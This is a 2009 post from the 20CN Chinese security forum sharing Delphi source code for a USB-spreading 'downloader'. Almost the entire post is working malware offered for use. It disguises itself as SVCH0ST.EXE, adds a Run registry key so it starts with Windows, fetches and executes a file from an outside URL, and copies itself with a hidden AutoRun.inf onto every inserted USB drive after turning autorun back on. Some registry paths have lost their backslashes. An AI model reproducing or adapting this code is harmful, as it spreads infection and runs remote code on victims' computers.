20CN网络安全小组论坛 - 菜鸟乐园 - U盘传染下载者源代码

论坛: 菜鸟乐园标题: U盘传染下载者源代码

作者: Winmillion [winmillion]

论坛用户

interface

uses
Windows, Messages, SysUtils,Forms,IniFiles;
type
TFrm_Main = class(TForm)
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
public
{ Public declarations }
end;
const
exefile = 'SVCH0ST.EXE';
Buffer = 'http://www.888.com/hello.exe';
DBT_DEVICEARRIVAL = $8000; // system detected a new device
DBT_DEVICEREMOVECOMPLETE = $8004; // device is gone
DBT_DEVTYP_VOLUME = $00000002; // logical volume
DBTF_MEDIA = $0001; // media comings and goings
type
PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
TDEV_BROADCAST_HDR = packed record
dbch_size : DWORD;
dbch_devicetype : DWORD;
dbch_reserved : DWORD;
end;
PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
TDEV_BROADCAST_VOLUME = packed record
dbcv_size : DWORD;
dbcv_devicetype : DWORD;
dbcv_reserved : DWORD;
dbcv_unitmask : DWORD;
dbcv_flags : WORD;
end;

function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
StatusCB: Pointer): LongWord;
stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';

function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
stdcall; external 'kernel32.dll' name 'WinExec';

var
Frm_Main: TFrm_Main;
exefull:string;
implementation

{$R *.dfm}

function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;

procedure Startup(var TheName:string);
begin
SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
messagebox(0,'文件下载成功！','成功',MB_OK);
WinExec(PChar(TheName), SW_SHOWDEFAULT);
//Sleep(500);
//DeleteMe;
//freemem(@path,256);
end;

procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
lpdb : PDEV_BROADCAST_HDR;
lpdbv : PDEV_BROADCAST_VOLUME;
unitmask:DWORD;
i:integer;
MyIni:TIniFile;
s:Hkey;
value:dword ;
inifile:string;
begin
lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
case Msg.WParam of
DBT_DEVICEARRIVAL ://有设备安装完毕

if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
begin
lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符
for i:=0 to 25 do //遍历磁盘
begin
if Boolean(unitmask and $1)then//看该驱动器的状态是否发生了变化
break;
unitmask := unitmask shr 1;
end;
if fileexists(exefull) then //向u盘拷文件
begin
copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
FileSetAttr(char(i+65) + ':' + exefile,$00000003);
end;
inifile:=char(i+65)+':AutoRun.inf';//ini文件
RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
value:=0;
RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
RegCloseKey(s);
if fileexists(inifile) then
begin
FileSetAttr(inifile,$00000000);
DeleteFile(inifile);
end;
MyIni := TIniFile.Create(inifile);
MyIni.WriteString('AutoRun', 'open',exefile);
FileSetAttr(inifile,$00000003);
end;
end;
end;

procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
Application.ShowMainForm:=False;
getsystemdirectory(path,120);
exefull := strpas(path) + '' + exefile;
size:=256;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
RegCloseKey(s);
//文件存在且有自启动
if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
messagebox(0,'自启动成功！','成功',MB_OK)
else
Startup(exefull);//下载执行函数
end;

procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Application.Terminate;
end;

end.

地主发表时间: 09-03-09 21:31

论坛: 菜鸟乐园